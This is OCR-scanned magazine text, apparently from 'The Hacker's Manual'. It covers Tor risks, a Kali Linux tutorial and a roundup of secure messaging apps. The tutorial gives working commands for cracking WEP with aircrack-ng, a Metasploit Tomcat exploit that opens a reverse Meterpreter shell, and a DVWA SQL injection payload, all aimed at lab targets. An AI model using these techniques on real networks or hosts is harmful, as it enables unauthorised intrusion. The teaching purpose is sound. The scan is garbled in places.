troubled times, when in certain parts of the world there encryption can be broken and any connection traced. All it takes is
are a lot of displaced people and resurgent dystopian vast quantities of money and resources. Tor is about as safe as can
states are cracking down extra hard on dissidents, be - even if a nation state actor is taking a particularly close interest
resistance and any mention of the word "war”. in what you’re up to online.
Without using a bridge, it took us three tries to join But that doesn't mean it’s perfect - the Tor devs are continually
the network, and several seconds to get to the spartan patching vulnerabilities, while law enforcement continues to try to
Linux Format homepage. Getting to the Gmail login exploit them. In the early 2010s, police had notable successes in
tracking down and prosecuting Tor users who traffic in child abuse.
Linux Format 295 Threat actors can also compromise Tor connections by taking
Pubtobed Tut 18 October 2C22
control of huge numbers of Tor nodes, carrying out autonomous
Sy
m New rove. eavesdropping attacks and analysing timings to expose who is
connected at one end of the network.
These attacks are not trivial and are difficult to carry out, but they
are real, and Tor users need to be aware of them.
Any easier way for authorities to compromise would-be Tor users
is to inject malware into it. In 2022, security researchers found that
searches for Tor in China led users to download a version of the
Bud the ukrnate retro emulation gammg experience relrve your Amiga Basic days and explore the huge open sou ce software that saves user’s browsing history and form data, and
emulation world1 Discover al the software to enjoy the classic computer days of the ZX Spectrum. Commodore 64. Atari
ST. Amiga and more. Wei even run a mainframe lor fun even downloads malicious components to computers with Chinese
PLUS Search your PC layer morwor your bandwidth, perfect your 3D pruts, ful disk encryption, the best LQhtweijht
cfcsiros tested we drve nlo Ktibeine'.es and loads mote’ IP addresses.
Only download Tor from the official site or repository. If you can’t
> The Linux Format website looks as glorious when
access these, get a copy from someone you know and trust.
viewed through the Tor Browser as it looks through
any other browser.

The Hacker’s Manual | 53


Security

Kali Linux
Hack Wi-Fi, break things
We’re left wondering how the goddess Kali feels
about being associated with so many script kiddies?

efore we do anything, a standard other members of your household what original WPA has been deprecated, but is still
disclaimer: Do not use any of you're up to. much more secure than WEP). Cracking
these techniques against a With that out of the way. we can get on with wireless networks (not just WEP ones) isn’t
machine that’s not under your some introductory penetration testing. You just a matter of repeatedly trying to connect
control, unless you have been given explicit can use Kali straight from the disc, install it. or using different passwords as most routers
permission to do so. would blacklist the MAC
This guide could potentially address of any device that
be used to access things that “Do not use any of these tried that. Instead, a more
you're not supposed to, and if
you get caught (and, believe us,
techniques against a machine passive approach is required,
so we set our wireless adaptor
you will get caught if this guide that’s not under your control.” to a special mode where it
is your only source) you might silently sucks up all packets as
find yourself at the wrong end of the just install the tools (wiresharkand aircrack-ng they fly through the air, rather than sending
Computer Misuse Act, or whatever is the are available in most repos) on your preferred any of its own. Often called ‘monitor’ mode.
legislation in your locale. Even if it doesn't get Linux distribution (distro). For our first trick, We won't cover setting up a WEP network
to the courts, being woken up at 6am by law well show you how trivially easy it is to crack a here, you can do it with an old router or even
enforcement officers demanding that you WEP-secured wireless network. The on your current one, so long as everyone else
surrender all your hardware is no fun. Also if, underlying attacks used by aircrack-ngfirst in the household knows their network
for example, you're using Wireshark io collect came into being about 15 years ago. and activities are potentially all visible. Our
packets from your home wireless network, everyone should be usingWPA2 fortheir preferred solution is to set up a Raspberry Pi
then as a matter of course you should tell password-protected networks now (the running hostapd. the relevant hostapd.contig

54 | The Hacker's Manual


Kali Linux
file looks like: commands accordingly. You can check that monitor mode is
interface=wlanO indeed active by running iwconfig wlanOmon.
driver=nl80211 Note that in Kali Linux, unlike pretty much every other
bridge=brO distro. the default user is root. Just as well because most of
ssid=WEPnet these commands need privileged access to the hardware. Kali
hw_mode=g isn't really intended to be a general purpose distro, so the
channels usual concerns about privilege separation don't apply. Now
auth_algs=3 the fun can begin with # airodump-ng wlanOmon .
wep_default_key=O Airodump will have your adaptor hop between channels
wep_keyO=" short” and tell you everything it sees—access point names (ESSIDs)
Our 5-character key corresponds to 40 bits, which is the and MAC addresses (BSSIDs) and any clients connected to
best place to start. Cracking longer keys is certainly possible, them. Note the BSSID and channel of the network you wish to
but requires more packets and more time. We should be able attack, we'll refer to the fictitious OO:de:ad:be:ef:OO and
to crack a 40-bit key in around one minute (and that includes channel 6. Knowing the MAC address of a client connected to
the time taken to capture enough packets). Once you've got the network may come in handy later on when we come to
a target WEP hotspot set up, we can focus on our Kali Linux- inject packets. You can generate traffic by connecting to the
running attack machine. WEP network and doing some web browsing or other activity.
You should see the #data column increase as more packets
Preparing the attack are collected. When you begin to feel slightly voyeuristic,
Getting wireless devices working in Linux is traditionally a press Ctrl+c to stop the capture.
source of headaches. Some adaptors require extra firmware In a genuine penetration testing scenario though, it would
to work, and many have other peculiar quirks all their own. be cheating to generate traffic this way (we're not supposed
As such we can't really help you. but in general if your device to know the key at this stage, that's what we're trying to
works in another distro, it should do so in Kali Linux too. figure out). But we have a cunning trick up our sleeve,
Unfortunately, even if you do get it working normally, many hardware permitting. Test if your card can inject packets, this
wireless drivers will still not support monitor mode. Some works best if the attacking machine is close to the router
(such as Broadcom’s wl driver for BCM2235-2238 chipsets (which might be hard if said machine isn't portable):
commonly used in laptops) do, but require you to activate it in # aireplay-ng -9 -e WEPnet -a OO:de:ad:be:ef:OO wlanOmon
a non-standard way, others claim to but don't. All in all it's a Hopefully you'll see something like this, the replay attack
bit of a minefield, but the aircrack_ng website maintains an won't work well unless packets can be injected reliably:
up to date list showing the state of various chipsets at 02:23:13 00:13:EF:C7:00:16 - channel: 6 - ‘WEPnet’
www.aircrack-ng.org/doku.php?id=compatibility_drivers.
Before we attempt to activate monitor mode, it's a good
idea to disable NetworkManager or any other process which
talks to the network card (wpa_supplicant, avahietc). These
might interfere with things and the last thing we need is
interference. Once the device is in monitor mode it will no
longer be a part of the network, so you won't be able to
browse the web etc unless you also have a wired connection.
To test if monitor mode is available on your device, fire up Kali
Linux, open up a terminal and run # airmon-ng start wlanO 6
replacing wlanO with the name of your wireless interface
(which you can find out from iwconfig ) and 6 with the
channel which the wireless channel of the target network
(although at this stage it doesn’t matter). You'll get a warning
if NetworkManager or friends were detected, along with their
PI DS so that they can be duly killed. Hopefully at the end of
the output there will be a message such as:
(mac80211 monitor mode vif enabled for [phyOjwlanO on
[phyOjwlanOmon)
We end up with a new network interface called wlanOmon,
different drivers will result in different names, monO is
common too, so keep a note and adjust any subsequent > DVWA is all kinds of vulnerable, we wonder what havoc this query will wreak?

We need to talk about WEP


Apart from short keys (the original WEP and doing some number crunching to derive the IP addresses), capture them and inject them
specified 40- or 104-bit keys and early routers key. For a 40-bit key. we can get away with as back to the router, so that it sends out
were forced into choosing the former), the few as 5,000 packets. If the network (or rather corresponding ARP replies. We can recognise
protocol itself is vulnerable to a statistical attack. the nodes of it within earshot of our wireless ARP request packets by their size so it
Besides the 40-bit key, a 24-bit initialisation device) is busy, this will not be a problem. If not doesn’t matter that we can't decrypt their
vector (IV) is used to encrypt the data packet. we can use a sneaky trick to get the router to contents. Each ARP reply will give us a new IV.
The most practical attack against WEP involves generate some. Specifically, we can listen for which will be another rap at the door of our WEP
collecting many IVs and their associated packets ARP request packets (used to connect MAC and network's undoing.

The Hacker's Manual | 55


Security
» 02:23:14 Ping (min/avg/max): 1.384ms/7.336ms/21.115ms If you don't see a reassuring Association successful:-)
Power: -39.73 then the next step most likely won't work as is. However, if
02:23:14 30/30:100% you add in the MAC address of a device associated with the
If that works we can inject packets of any shape or size to WEP network with the -h switch, then that ought to fix it.
the router. Unfortunately, it will generally ignore them Start the replay attack with:
because (a) we aren't authenticated with the network and (b) # aireplay-ng -3 -b 00:de:ad:be:ef:00 wlanOmon
we still can't encrypt them properly because we don't know Generating WEP traffic will speed this up, and remember
the key. What we can do, if we can figure a way around (a), is there won't be any ARP requests to replay unless something
listen for ARP requests and send them back out into the is connected to the network, so you may have to cheat a little
ether. The same ARP request can be used many times, the here to get things going. Eventually you should see the
more replays the more IVs. If packet injection isn't working numbers start increasing. The packet count in the airodump-
then just stick with generating traffic directly via the WEP ng session should increase accordingly, and it shouldn't take
network. We were able to crack our short key with just 5,000 long to capture the required packets, sometimes you'll get
packets, so without further ado, let's recommence the packet away with as few as 5,000, but generally 20-30k will suffice
capture. This time we'll restrict the channel and BSSID so that (some packets are better than others). At the top end, this is
we only capture relevant packets: only around 10MB of data. Ctrl+C both the dump and the
# airodump-ng -c 6 -b 00:de:ad:be:ef:00 -w Ixfcap wlanOmon replay processes. We'll cheat a little by telling aircrack-ngto
The -w switch tells airodump-ngto save the packets to only search for 64-bit (40+24 bits of IV) keys:
disk with the prefix Ixfcap . They are saved as raw data (.cap) # aircrack-ng output-01.cap -n 64
as well as .csv and Kismet-compatible formats, for use in If you have enough packets, aircrack-ngW\W likely figure
further analyses with other programs. With the capture out the key almost immediately. Even without the -n 64 hint
running, open another terminal and attempt to do a fake with enough packets the attack can still be swift and deadly.
authentication with the router: You may be unlucky though and sent off to get more packets,
# aireplay-ng -1 0 -e WEPnet -a 00:de:ad:be:ef:00 wlanOmon in which case run airodump-ngand aireplay-ngagain. If you
see a message about being dissociated during the replay
attack, then you will need to do another fake authentication.
The output filenames will be incremented, and you can use
wildcards on the command line, eg output*.cap to use all of
them at once.
Once you've cracked a 40-bit WEP key, the next logical
step is to try a 104-bit (13 character) one. The procedure is
exactly the same, only more packets will likely be required
(we managed it with 25,000 IVs). Cracking WPA2 keys is a
whole different ball game, there are no nice attacks, but if you
are able to capture the four-way handshake as a new device
connects, then a dictionary attack can be used.

Exploits and injections


It would be remiss of us to feature Kali Linux and not mention
the Rapid 7’s Metasploit Framework (MSF). MSF allows
security mavens to submit modules to test for (and
optionally exploit) all manner of vulnerabilities, whether it's
the latest use-after-free bug in Flash, an SQL-injection bug in
Drupal or some new way of sending the Windows Update
service into spasm. It's immensely powerful and we hardly
> Even 128-bit WEP keys can be trivially cracked with just a handful of packets. have space to even scratch the surface of it here.

Reggae Wireshark
As a pen tester, once you've got hold of a requests and acknowledgements.
wireless key there's no reason to stop However, we can tell Wireshark our key
there. Besides having access to any and these packets will surrender all of
resources on that wireless network you their secrets. Go to Edit > Preferences >
can also decrypt its traffic. Wireshark is a Protocols > IEEE 802.11 and tick the
great tool for capturing and viewing Enable decryption box. Click the ’Edit'
packets. You'll find it in Kali’s Sniffing & button next to Decryption Keys, and then
Spoofing menu, or you can install it on click on the'+' to add a new key. Ensure
any decent distro. We've already captured the type is set to WEP and enter the ASCII
a bunch of WEP-encrypted packets so codes of each character of the password,
lets have a look at those. Go to File > optionally separated by colons, eg our
Open and choose one of the output*.cap initial password short would be entered
files. Initially there's not much to see, 73:68:6f:72:74 . Once you leave the
most packets will just be listed as Preferences dialog, all the packets will
amorphous IEEE 80211 data, and there have been delightfully colour coded, all
will be some other boring network sources and destinations revealed.

56 | The Hacker's Manual


Kali Linux
Nonetheless we can illustrate some of MSF’s powers by > Metasploit
taking liberties with the Metasploitable 2 Virtual Machine Framework
There wasn't space to include it on the disc, but those who can only show
don't care about a 800MB download can get it from you the door,
http://bit.ly/MetasploitableRapid7 in exchange for some you must
walk through
details or from http://bit.ly/SFMetasploitable2 if you'c
it. Or buffer
rather get it quietly. Unzip the metasploitable-linux-2.0.0.zip
overflow your
file and you’ll find a VMware virtual machine. The actual disk
way through it.
image (the VMDK file) can happily be used in VirtualBox(with
the 'Choose an existing virtual hard disk’ option) or Qemu.
In order for the VM to be visible on the network, it needs its
virtual network adaptor to be configured in bridged mode as
opposed to NAT. In VirtualBox. we can achieve this by going to
the Network tab, and setting ‘Attached to' to ‘Bridged
Adapter'. It will then act just like a regular device attached to
your network—if DHCP is available everything should just
work, otherwise a static IP can be configured. ready to launch the attack with exploit. All going well, you
Start the VM, and then log in as user msfadmin with the should see something like:
password the same. Find the device's IP address using ip a. [*] Sending stage (46089 bytes) to 192.168.1.10
If devices on the network need static IP configured, this can [*] Meterpreter session 1 opened (192.168.1.2:4444 ->
Wedidn'thavetime
be done from /etc/network/interfaces (the VM is based on 192.168.1.10:33304)... to cover Burpsuite
Debian Lenny). There are a number of terribly configured and Followed by a new meterpreter prompt. Type help for a here, but it's a very
vulnerable services running on this VM. so it's a particularly list of commands, they're different to Bash, although that sort powerful tool for
bad idea to run this on an untrusted network. The extra of shell is available from the shell command. If we type finding holes in
web applications.
cautious should even disconnect their routers from the execute meterpreter's getuid command, we can see that we
Unfortunately
Internet at large. We’ll use MSF to exploit the Tomcat service, have the access privileges of the tomcat55 [/user]. We could some of the more
which you can connect to by pointing a browser at port 8180 probably do some damage like this, but the Holy Grail is interestingfeatures
on the VM's IP address, which we'll use 192.168.1.10 to refer. getting root access. As luck would have it. there's a privilege areonlyavailablein
thepaid-foredition.
This particular instance of Tomcat has a manager escalation vulnerability in another part of the system (the
application running at /manager/html with easy to guess distcc daemon) which you can read about in the
credentials (hint: it's tomcat/tomcat). The manager allows Unintentional Backdoors section at https://community.
arbitrary applications (packaged as WAR archives) to be rapid7.com/docs/DOC-1875. Before we go though, well look
uploaded, which is not something you really want anyone to at a textbook attack.
be able to do. No matter how you exploit a service, a common DVWA, the Damn Vulnerable Web Application, should be
accessible at http://192.168-l.10/dvwa. As

“For fun and games why you can probably fathom, it features
somewhat underwhelming security. This is

I not download a Windows XP


virtual machine.”
goal is to get shell access to the target machine. This is
usually done by starting a reverse shell on the recently
exploited machine. Once initiated, the shell will 'call back' its
immediately obvious from the login page,
which kindly tells you what the admin
password is. Log in with those details, then
select 'DVWA' from the left-hand column and
set the Script Security to low. As if things weren't bad enough
already. Now go to the SQL Injection page. The idea is that you
enter a User ID (in this case a number from 1 to 5) and the
master and enable them to enter commands with whatever script returns that user’s first and last names. It works, try it.
privileges the exploited service had. Well use a Java payload Sadly, DVWA is also vulnerable to a classic SQLi. Look at what
to achieve just this in MSF. Start MSF on the Kali machine, it's terrible things happen if you put this code into the User ID
in the 08. Exploitation Tools menu. If you see an error, wait a field: T or 1=1 #. Zoiks! The script got very confused and just
minute and try again. It has to create its database on first run returned all of the IDs. The reason for this oversharing is due
and this sometimes takes longer than it's prepared to wait. At to the underlying PHP query, which looks like:
the msf> prompt enter: Sgetid = “SELECT first_name, last_name FROM users
use exploit/multi/http/tomcat_mgr_deploy WHERE userjd = ‘$id‘”
Note the prompt changes. You can find out more about the By crafty quote mismatching, the last part of our query is
exploit by typing info . Next, we set some parameters for the then interpreted as: WHERE userjd = T or 1=1 #”.
exploit module. Change the RHOST according to the results of The double quote at the end is commented out by the #
the ip a command on the Metasploitable VM earlier: and the clause or 1=1 ensures that the WHERE expression
set RHOST 192.168.1.10 is always true. So all records are returnee. There’s really no
set RP0RT 8180 reason for this sort of coding blunder. PHP includes nice
set USERNAME tomcat functions to sanitise user input and prevent this sort of thing.
set PASSWORD tomcat But here must end our brief foray into Kali Linux, but do
set PATH /manager/html explore it further. For fun and games why not download a
set TARGET 1 Windows XP virtual machine (which you can do entirely
These are all self-explanatory except the last one, which legitimately provided you delete it after 30 days) and see how
tell MSF to create a Java payload, as opposed to something much damage you can cause with Metasploit. Hint, we
OS-specific, which won’t work for this exploit. We’re now enjoyed MS12-020. ■

The Hacker's Manual | 57


Security

Secu re
chat
While not particularly paranoid, we wouldn't want anyone to eavesdrop on our
playful banter about the Great British Bake Off with our mates.

How we tested...
We'll look at each instant messager's
mechanisms for enhancing security
and privacy, and whether any of
these has a negative effect on the
usability of the application.
We'll also keep an eye out for
applications that are cumbersome
to use and ruin the user experience
in their efforts to ensure privacy.
Some users that are exchanging
sensitive information probably won't
mind taking a hit on usability if it
ensures stronger privacy, but the
majority are unlikely to want to jump
through too many extra hoops.
We'll also keep an eye out for I Ms
that offer the same convenience and
features as their popular
counterparts. On a related note, an
IM's repository and its supported
platforms can be a key deciding
factor. Similarly, you can't get
anyone to switch to a new app if the
installation is long and drawn out.

ver the years, instant In their bid to outdo the competition, be subpoenaed. So while IM clients and

O messaging (or IM) has


evolved into a full-fledged,
feature-rich medium for
communication. Besides simple text
virtually all of the popular IM services
use their own home-brewed proprietary
protocol. However, one thing many of
them overlook is security. To offer a
services are a dime a dozen, many of
them don’t offer the level of security
and privacy that makes good sense in
this post-Snowden era. In this Roundup,
messages, a typical IM session includes better communication experience to well look at some of the best options
the exchange of images, audio and even their users, these publicly accessible available to users that are looking to
video streams. While the primary users services route all your private converse online without the fear of
of IM are home users. IM has also been exchanges via central servers that can being snooped.
adopted for use by companies behind
corporate firewalls. Both kinds of users
have a different set of requirements and
“Publicly accessible services

58 | The Hacker's Manual


a plethora of messaging services have
popped up to satiate the growing
demand for instant messaging.

I route all your private exchanges


via central servers.”
Secure chat

Security protocols
How do they secure the transmission?
he main reason for using these GoldBug uses end-to-end

T IM clients is because the


developers have taken extra

communication and focused on the


encryption with multiple layers of
cryptology. In addition to RSA, it uses
the EL Gamal encryption algorithms
measures to ensure the security of the
and also NTRU, which is particularly
privacy of their users. CryptoCat. for regarded as resistant against quantum
> You can use Retroshare over Tor to hide the connection
instance, works on the assumption that computing.To create more between you and your friends.
the network is controlled by an attacker randomisation, while creating keys
who can intercept, tamper with and each user can set their individual key
inject network messages. size, cipher, hash type, iteration count The qTox client is based on the Tox
To maintain privacy over such a and the salt-length. Furthermore, the protocol which uses the NaCI crypto
network. CryptoCat helps its users set encrypted messages are sent through library to enforce end-to-end
up end-to-end encrypted chat a P2P self-signed SSL channel to the encryption with perfect forward secrecy.
conversations using a Double Ratchet­ peer. This self-signed SSL connection This protocol generates a temporary Verdict
based encryption protocol. The users is secured by a number of means to public/private key pair that's used to
CryptoCat
link their devices to their Cryptocat ensure that a compromised node isn't make connections to non-friend peers.
★★★★★
account upon connection and can able to connect. The client then uses Onion routing to
Goldbug
identify each other's devices via the J/te/supports the popular Off-the- store and locate Tox IDs to make it ★★★★★
client's device manager to prevent man- Record (OTR) protocol to encrypt IM practically impossible to associate Jitsi
in-the-middle attacks. After the initial conversations. OTR uses a combination users to each other. ★★★★★
qTox
key exchange, it also manages the of 128-bit AES, along with a couple of Retroshare users generate GPG (or
★ ★★★★
ongoing renewal and maintenance of other hash functions, to provide GnuPG) cryptographic keys and after Retroshare
short-lived session keys during the authentication and forward secrecy authentication and exchanging ★★★★★
session. All devices linked to Cryptocat along with encryption. Jitsialso uses asymmetric keys, it establishes an » All use solid
accounts will receive forward secure the ZRTP protocol to negotiate keys end-to-end encrypted connection open source
messages, so even if the current keys when it is establishing a connection via using OpenSSL. You can also optionally security protocols
and encryption
are compromised the previous the RTP protocol to exchange audio deactivate distributed hash table (DHT)
algorithms.
messages will still remain secret. and video. to further improve anonymity.

Audio and video calls


Can they securely transmit multimedia?
hile Goldbug has a good make real-time video calls. However, CryptoCat users can also exchange

W number of features, you can't


use it to make audio and
the client a lows you to record minute-
long encrypted video messages to your
video calls. The application does have
mechanism to share encrypted files
a that can be viewed
buddies
immediately or whenever they come
encrypted files and photos as long as
they are under 200MB each.
All audio and video calls made in
qToxcan be piped through secure
called Starbeam. CryptoCat also can't online within the next 30 days. channels and can also host group chats
with other users. Similarly, Jitsiis a VoIP
client and enables you to make calls
using the Session Initiation Protocol Verdict
(SIP). You can use Jitsito make audio
CryptoCat
and video calls to one user or to several
★★★
users on both SIP and XMPP networks. Goldbug
Retroshare also enables users to ★★
make audio and video calls after they Jitsi
enable the VoIP plugin. One USP of this ★★★★★
qTox
application is its ability to share large
★★★★★
files. Retroshare uses a swarming Retroshare
system, which is similar to BitTorrent, to ★★★★★
accelerate the download. Users can » CryptoCat and
share files with friends or with everyone Goldbug can’t
make secure
on the Retroshare network. There’s also
audio and
a search function to find files on the video calls.
> Jitsisupports TLS and certificate-based client authentication for SIP and XMPP. network anonymously.

The Hacker's Manual | 59


Security

User experience
Does it make instant messaging easy to use?
ll applications, and not just the ones in messages to your buddies. Since there's a interface will go a long way in getting your

A this Roundup, that prioritise security


have their job cut out for them.
They have to incorporate the extra security
and privacy features without distracting the
good chance your friends aren't using these
as they aren't as well-known instant
messengers, you’ll have to convince them (or
terrify them) to move. A straightforward
budd es to sign up to yet another service.
Using new applications that aren't too
dissimilar to the popular ones will help both
you and your friends to continue conversing
user from the main task: sending instant installation procedure and an intuitive without the application getting in the way.

CryptoCat ★★★★★
If it didn't insist on setting up a 12-character long password, CryptoCat
would feel just like any other IM client. When you sign in for the first time.
CryptoCat will generate encryption keys and store them on your new
device. It II do this every time you log into your account from a new
device. Each device has a unique fingerprint that you can verify with your
buddies. Once verified a device you can mark it as trusted.
For additional security, you can ask CryptoCat to send messages
only to trusted devices. When receiving messages. Cryptocat will always
show you which device your buddy used to send that message and
inform you whenever your buddy adds a new device. The IM window is
the standard fare and includes buttons to record and send minute long
video messages and files.

Goldbug ★
On the first launch, you'll be asked to create authentication information
and the application generates eight sets of encryption key pairs each for
a different task, such as messaging and emailing etc. Once the keys
have been generated, you'll have to enable the kernel using the 'Activate'
button. You can now connect to a chat server or the echo network and
add your friends.
Initially, the project adds its own chat server as a neighbour but this
is strictly for testing purposes only, and you'll have to exchange keys
with your friends before you can chat. Besides the option to import and
export public keys, Goldbugoffers an interesting option called Repleo
which enables you to export your public key after encrypting it with a
friend’s already imported key. Despite its uniqueness, Goldbughas one
of the most confusing interfaces and its workflow is the least intuitive.

Ease of installation
Is it newbie-proof? Verdict
CryptoCat
ruth be told, there aren’t many which severely limits who can actually builds as both Deb and RPM for all the ★ ★★★★

T of us who’d be willing to migrate


to a new application if the
use the IM.

installation is found to be a long, drawn


out process. This is especially true for a
Then there's Retroshare which only
has official packages for Ubuntu and
Debian. But the website lists unofficial
popular distros. including Ubuntu.
Debian, Fedora and Arch. The project
also hosts repos for Ubuntu. Debian
and Fedora to keep the packages
GoldBug
★★
Jitsi
★★★★
qTox
desktop-centric application such as an packages for OpenSUSE, Fedora, updated. Similarly, you can install qTox ★ ★★★
instant messenger. CentOS, Mage a. Gentoo, FreeBSD and via its official repos for Ubuntu 16.04, Retroshare
In this respect, the only application Arch Linux. There's also an unofficial Debian 8. Fedora 24, OpenSUSE Leap, ★★★★
that really disappoints is GoldBug. build for Raspberry Pi’s Raspbian called Tumbleweed. ARM and CentOS 7 as » Besides
While you can download packages for PiShare which was released in 2014. well as Arch Linux. CryptoCat tops the GoldBug, you
can get the other
installing GoldBugtrom SourceForge or On the other hand, the other clients lot since there's no installation involved.
IMs on your
from its unofficial PPA, the IM only has cover all the popular distros. Jitsi puts You just need to extract and execute the distro easily.
Deb files for Ubuntu Trusty Tahr (14.04) out stable and bleeding edge nightly compressed archive.

60 | The Hacker's Manual


Secure chat
Jitsi ★★★★
Using J/fs/is fairly intuitive as well. Begin by logging into an XMPP or a
SIP server or both. By default, all conversations with your contacts on
either networks are unsecured. You use the Secure chat pull-down menu
in the chat window to bring up the options to encrypt your conversation.
When you initiate a private conversation, Jitsi will first ask you to
authenticate your contact. You can do so by either asking them a shared
secret or verifying their fingerprint via another authenticate channel.
For more privacy, after you've encrypted the conversation, you can ask
Jitsito stop recording the chat session with a single click from within the
chat window. Similarly, you can initiate an audio and video call and
secure it by comparing the four-letter ZRTP key displayed on both your
screens to ensure your conversation isn't being hijacked.

Retroshare ★★★
Retroshare looks very different to a traditional IM client. On first launch,
it looks rather bare and none of the tabs at the top list any content.
That’s because Retrosharefetches these from your friends, so you'll
have to view any content on the Retroshare network.
You can add friends directly by sharing your keys privately or you can
exchange your keys with a chat server. You'll need to head to the chat
lobbies and look up 'Chatserver EN' to join the chat, say hello and paste
your key. To friend someone,you must exchange keys. You’ll have access
to all the forums, downloads and channels that your friends are
subscribed to. Note: It will take a few hours before you get all forums and
channels from your friends.

qTox ★★★★
Like CryptoCat, the user interface of qTox resembles that of a traditional
IM client. You'll be asked to create a new profile when you first launch
the application. You can then add new contacts using one of two
methods: either by sending your Tox ID via secure means, such as
encrypted email, or, if your friends are using a Tox mobile client, you can
send them a copy of the QR code image generated by your client.
Once you're connected, you can interact as you would using a
normal IM client except for the fact that your conversation isn't flowing
through a central server. The chat window also has buttons to initiate
audio and video calls. You also get buttons to create chat groups and
send files, and there’s an option to capture and send screenshots.

Help and support


Need some handholding? Verdict
CryptoCat
n paper, Goldbug has a manual users get acquainted with the familiarise new users with the new ★★★

O in English as well as a detailed


entry on wikibooks. In reality

very crude translations of the original


Retroshare network and the app. On
the forums you'll find platform-specific
boards that tackle common problems
however, the English documents are
and their solutions.
messaging protocol.
Besides a smattering of textual
documentation, Jitsicovers a couple of
useful tasks via user-contributed videos,
Goldbug
★★
Jitsi
★★★★
qTox
German manuals and, therefore, many qTox is fairly intuitive to use, but such as initiating an encrypted chat ★★★★
things don’t make much sense at all. there's also a user manual that explains session and making a secure ZRTP Retroshare
We also didn't find off-site, unofficial the various 'unctions and the features, video call. For textual help, new users ★★★★
information on the internet. while help and support is dispensed via have a detailed FAQ. Last but not least, » Goldbug has
Retroshare provides a wealth of mailing lists. The qTox-specific the help section of CryptoCat is a single lots of support
docs but they
information including a FAQ, wiki, a blog, resources are complemented by page FAQ-style document that covers
are poorly
and forums. The documentation covers documentation on the website of the everything that a user needs to know to translated.
a vast number of topics to help new Tox protocol. There’s a FAQ and a wiki to use the application.

The Hacker's Manual | 61


Security

Platform support
Can they be used on mobile and other platforms?

hile you can convince your Raspberry Pi. Jitsialso has installers for

W buddies to move to a
different IM client with better

them to switch operating systems as


Windows and macOS for both its stable
release as well as nightly builds. The
security and privacy, you can't expect
Downloads page also points to an
experimental build for Android.
well. Of course, in an ideal world However, the most recent APK on that
everybody would be using GNU/Linux
and this wouldn't be an issue at all.
page is over two-years-old.
The Tox protocol covers the widest
Verdict
But that doesn't mean that folks using range of platforms. Besides Linux, qTox CryptoCat
inherently less secure OSes can't use a has a FreeBSD port, 32-bit and 64-bit ★★★
GoldBug
secure IM client. clients for Windows as well as an
★ ★★
Thankfully, all the IMs in this experimental build for macOS. While
Jitsi
Roundup support multiple desktop qTox itself doesn't have builds for ★★★
OSes in addition to Linux but only a mobile platforms, you can use it to qTox
couple support mobile platforms. connect with other Tox clients. There's ★ ★★★★
Retroshare
CryptoCat. Retroshare and GoldBug Antidote for iOS and Antox for Android.
★ ★★
can all be installed on Windows and In our tests, we didn't run into any
» qTox is
macOS as well. However, Goldbug issues I Ming with users on different Tox interoperable with
treats Linux users as second-class clients and platforms. other Tox clients,
citizens and only offers the latest which means it
version (3.5) to Windows and Mac supports the
) Antox is under active development
widest range of
users. Also. Retroshare is the only client and the performance of audio and platforms.
on test here that has a build for the video chat sessions varies greatly.

Extra features
What more can they do besides IM and video?

hile these applications bill mechanisms, such as VNC. J/fs/ also

W themselves as instant
messengers some of them
can do a lot more than send simple
messages. Most of them enable you to
enables you to stream either the entire
desktop or a portion of the screen.
can even enable your contact to
Youtext
remotely control your desktop.
have encrypted voice and video calls Moreover, users at both ends of a call
and can also send files over the can share their desktops with the other
encrypted channels. person at the same time. The
However, there's not much more application also has a number of
you can do with CryptoCatthan enterprise-friendly features, such as
exchange encrypted text messages and support for LDAP directories.
securely transfer files. qToxfares a little Goldbugand Retroshare stand apart > Goldbug has additional encryption
better, its desktop users can also host from the others in that they are much tools, such as the Rosetta Cryptopad
group chats with other users. The larger platforms for secure which is an alternate to GPG and can Verdict
application also supports ToxDNS communication and enable you to encrypt any text for transport via
traditional unsecured mediums. CryptoCat
which is used to shorten regular Tox IDs interact with your friends in several ★
into memorable IDs that resemble an different ways. Both, for example, Goldbug
email address, and the client includes include an email system that takes ★★★★
Jitsi
screen-capturing capabilities to help advantage of their respective peers to boards as well as a public notice board
★ ★★
you quickly share snapshots. store and exchange encrypted where you can paste links, vote and
qTox
Jitsi is a full-fledged softphone that messages. Goldbug can also be used to discuss topics in a similar way to Reddit, ★★
can mute, put on hold, transfer and send encrypted emails over traditional (but perhaps without as much snark). Retroshare
record calls. It can also make registrar­ POP3 and IMAP services. You can also Then there's the Channels section ★★★★★
less SIP calls to other Jitsiusers on the use it to have discussions over where you can publish your files. » Goldbug and
RetroShare can
local network. One of Jitsis unique encrypted public IRC channels in which You can also subscribe to any of the
send encrypted
features is its ability to stream and each chat room is defined with a listed channels, much like RSS feeds, to emails without a
share your desktop without using any magnet link. In addition to email, automatically download the latest mail server.
of the traditional desktop streaming Retroshare offers decentralised forum published files.

62 | The Hacker's Manual


Secure chat
Secure Instant Messengers

The verdict
ll the instant messengers in the together cover all the major desktop

A Roundup go the extra distance


to make sure you keep your
conversations to yourself. We've looked
at simple applications that encrypt text­
and mobile OSes. However, the protocol
is still relatively new and the
performance of the multimedia calls
isn't consisient across the various
based communication to more complex supported platforms. This is the biggest
communication suites that enable you reason for qTbxfinding itself on the
to send email and make video calls via lowest step on the podium. > Using Jitsi Videobridge, Jitsi users can easily host multi­
encrypted channels. The runner-up spot goes to the user video calls if they have the bandwidth.

It's tough to recommend one over ffetroS/iarewhich walks the fine line
the other so we'll rate them by the between function and usability. The communicates via a central server, but
Holmesian method of elimination. application and the network are both Jitsi provides good options to encrypt
Goldbug is the first to get the axe feature-rich and don't take too much to sessions and prevent snooping. Also
because of its confusing Ul and steep acclimatise to. We were impressed by setting up a central server on your
learning curve. Next up is CryptoCat RetroShares personalisation of the premises doesn't take too much effort.
which is intuitive but only secures text­ peer-to-peer model into a friend-to- Better still, you can use Jitsis registrar­
based communications. Then there's friend network that’s totally off the grid. less SIP feature to make secure
qTox which ticks all the checkboxes to But it's a drastic change for any encrypted calls to users on the local
take the top spot. For starters, it isn't all friends you want to communicate with, network out of the box.
that different from a traditional IM client so we've rewarded
and is equipped with all the security
and privacy features you'd expect from which findsthe
“We
e
’ve awarded the top spot to
a secure client. You can use qTox to right balance Jitsi, which finds the right balance
make audio and video calls and it plays between form and i . r ir ••
well with other Tox clients which function, ycs it between form and function. ”

Jitsi ★★★★★ CryptoCat


Web: www.jitsi.org Licence: Apache 2.0 Version: 2.9 Web: https://crypto.cat Licence: GNU GPL v3 Version 3.2.08
» The best bet for securing IM without making drastic changes. » Good option for encrypting text-based communications.

RetroShare ★★★★ Goldbug


